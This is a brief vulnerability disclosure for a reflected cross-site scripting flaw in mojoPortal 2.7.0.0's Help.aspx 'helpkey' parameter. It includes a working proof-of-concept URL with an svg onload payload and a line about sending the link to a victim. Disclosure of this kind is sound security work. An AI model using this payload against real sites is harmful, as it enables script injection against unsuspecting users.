- Date: 29/09/2023
- Affected Version: mojoPortal 2.7.0.0
- Vendor Homepage: https://www.mojoportal.com/
- Exploit Author: Trungvm of VietSunshine Cyber Security Services
Cross Site Scripting vulnerability in mojoPortal v.2.7.0.0 allows a remote attacker to execute arbitrary code via the helpkey parameter in the Help.aspx component. This vulnerability is the bypass of CVE-2017-1000457
Send the URL http://[site]/Help.aspx?helpkey=xxxxxxx'><svg/onload=alert()+x=' to victim. When victim opens the URL, XSS will be executed
